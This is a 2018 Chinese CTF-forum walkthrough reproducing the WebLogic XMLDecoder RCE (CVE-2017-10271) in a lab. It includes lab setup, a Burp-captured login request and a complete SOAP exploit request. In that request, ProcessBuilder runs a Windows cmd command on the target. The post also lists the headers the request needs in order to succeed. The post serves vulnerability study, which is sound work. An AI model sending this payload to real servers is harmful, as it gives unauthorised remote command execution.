CTF论坛 - CTF交流社区

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
本帖最后由 misskiki 于 2018-1-9 03:16 编辑

0×01。文章有点长,请各位看官慢慢看。还有就是自己头铁理解能力差“希望对有兴趣研究的朋友有帮助”

0×02。最近上班看到好多微信公众号转发这个漏洞,来论坛,准备研究大牛的姿势,无赖账号表僵尸了啦
0x03。自己就从网上看知识先装个环境漏洞,起初用kali装docker去搭建,可是不知道怎么回事装了好大半天,结果还装不上,是我技术问题吧。
这里讲如何安装搬运工

[mw_shl_code=php,true]http://blog.csdn.net/u013814153/article/details/53925790
官方文档
https://docs.docker.com/engine/i ... x/docker-ce/debian/[/mw_shl_code]

0x04。靶机Windows 2003服务器操作机win7
0x05。漏洞版本文件:如果是土豪用户复制下面链接

[mw_shl_code=applescript,true]百度云下载地址http://pan.baidu.com/s/1nvM4W5N提取密码:ag87[/mw_shl_code]


0×06。不是土豪用户那就去官方下载对应漏洞版本,不然百度云的限速,限到你怀疑人生是否被日

[mw_shl_code=applescript,true]weblogic官网下载地址http://www.oracle.com/technetwor ... or-dev-1703574.html
[/mw_shl_code]

0x07。下载完成安装方法cmd命令:cd C:\ Program Files \ Java \ jdk1.7.0_79 \ bin这个目录下执行java -jar xxx.jar(漏洞文件地址)每个人的java安装目录不一样
请自行改写。 之后弹出配置界面我默认选择下一步。君随便!

0x08。安装完成下面是百度搜到的某牛的方法 他没讲明白

[mw_shl_code=applescript,true]最近的CVE-2017-10271也是引起了一个小风波,所以趁着网速好的时候下载了一个Weblogic搭建起来打算进行一次复现。
漏洞环境: Windows 2008 R2

jdk版本:java 1.6.0_29(Weblogic自带)

WebLogic版本:10.3.6.0
部署Weblogic就不发了,百度上一堆。文章下方我会附带上Weblogic10.3.6.0的下载地址的。

附带文件上传&&命令执行(猥琐命令回显方法)POC

注意的是,在发送请求的时候,在请求头中必带Upgrade-Insecure-Requests: 1以及Content-Type: text/xml,否则是无法请求成功的。

文件上传:[/mw_shl_code]

0x09。所以我一步步理解透发上来--1

。访问我的机器地址。开启burp抓包

[mw_shl_code=applescript,true]http://192.168.21.103:7001/console/login/LoginForm.jsp
[/mw_shl_code]


--2。这是burp截到包是这样的

[mw_shl_code=applescript,true]POST /console/j_security_check HTTP/1.1
Host: 192.168.21.103:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.21.103:7001/console/login/LoginForm.jsp
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
Cookie: JSESSIONID=2FzNWdQj7BCVag1b9Za2PKh155ZItcTsbxoiX41cAXUOvK-qrTNv!540744547; ADMINCONSOLESESSION=zPjNX3oVu3pr2MkRE3lvKHFbPy4-SWaQ4uMhRO0910l41Bz6Ke3p!540744547
Connection: keep-alive
Upgrade-Insecure-Requests: 1

j_username=1&j_password=&j_character_encoding=UTF-8[/mw_shl_code]


--3。用下面POC替换刚刚你拦截的包,此时你的包变成下面内容。

[mw_shl_code=applescript,true]POST /wls-wsat/CoordinatorPortType?wsdl HTTP/1.1

Host: 192.168.21.103:7001
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Cookie: ADMINCONSOLESESSION=EyuBou39-ST7AlyotNoPLKktqrnsuRWG--n-h57dMpb9PsSnTdav!-2052172321
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Length: 944

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
     <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
            <java version="1.8.0_131" class="java.beans.XMLDecoder">
                <void class="java.lang.ProcessBuilder">
                    <array class="java.lang.String" length="3">
                        <void index="0">
                            <string>cmd</string>
                        </void>
                        <void index="1">
                            <string>/c</string>
                        </void>
                        <void index="2">
                            <string>start xxx223 </string>
                        </void>
                    </array>
                <void method="start"/></void>
            </java>
        </work:WorkContext>
    </soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>[/mw_shl_code]

- 5发送到中继器测试(我用ProcessBuilder执行系统命令)-- 6。看到返回信息代表成功去服务器看是不是已经添加好了; ok证明漏洞利用成功 其实网上exp有人多了,多多发觉,不要像我头铁从10点看到现在发帖才看懂 还有更多利用放法我就不一一发了 没条件安装的朋友可以去至安全那里有靶机测试。





分享到 :
0 人收藏

1 个回复

倒序浏览
wff   | 2018-2-27 16:36:24
提示: 作者被禁止或删除 内容自动屏蔽
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Powered by Bugku! X3.4 © 2017 CTFbbs.

返回顶部